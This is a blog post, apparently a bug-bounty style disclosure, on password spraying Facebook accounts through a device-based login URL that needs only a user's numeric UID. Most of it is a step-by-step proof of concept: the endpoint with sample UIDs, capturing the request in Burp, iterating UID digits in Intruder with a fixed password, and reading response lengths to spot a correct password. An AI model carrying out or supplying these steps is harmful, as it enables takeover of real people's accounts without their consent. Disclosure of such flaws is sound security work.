Password Spraying on Facebook Users without Email




Hello Friends,

I found that it's possible to perform password spraying attack on Fb users without email etc. 


Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. We can use multiple iterations using a number of different passwords, but the number of passwords attempted is usually low when compared to the number of users attempted. This method avoids password lockouts, and it is often more effective at uncovering weak passwords than targeting specific users.



Recently, I found that it's possible to login to Facebook account without email.
We just need to enter the password. 


https://free.facebook.com/login/device-based/password/?uid=100015345936046&flow=login_no_pin&_rdc=2&_rdr


So,This behavior allows to perform Password spraying attack on FB users without Email.



Proof of Concepts:

 First of all, visit this URL https://free.facebook.com/login/device-based/password/?uid=100006474705156&flow=login_no_pin&&_rdr
Change the UID  to victim or any FB user.
Enter any password (u want to spray) and Intercept with Burp
Send to Intruder.
In position, select uid number or uid last digits and in payloads,add uid or last digits in sequence then start the attack.


It's also possible to spray multiple passwords(but low limit) at a same time and over again.




In above screenshot, I just bruteforced last 3 digits of uid of Fb users.

Length 1527 means 1000 indicates that password not found and 2417 means 2000 indicates that we got the password means password found of that Fb user.
 


This method is used to find weak passwords, pick a strong and unique password and made different passwords for multiple accounts and never share your password.


 

Comments

Post a Comment

Popular posts from this blog

XSS in Zoho Mail

A Tricky Open Redirect

DoS on WAF Protected Sites by Abusing Cookie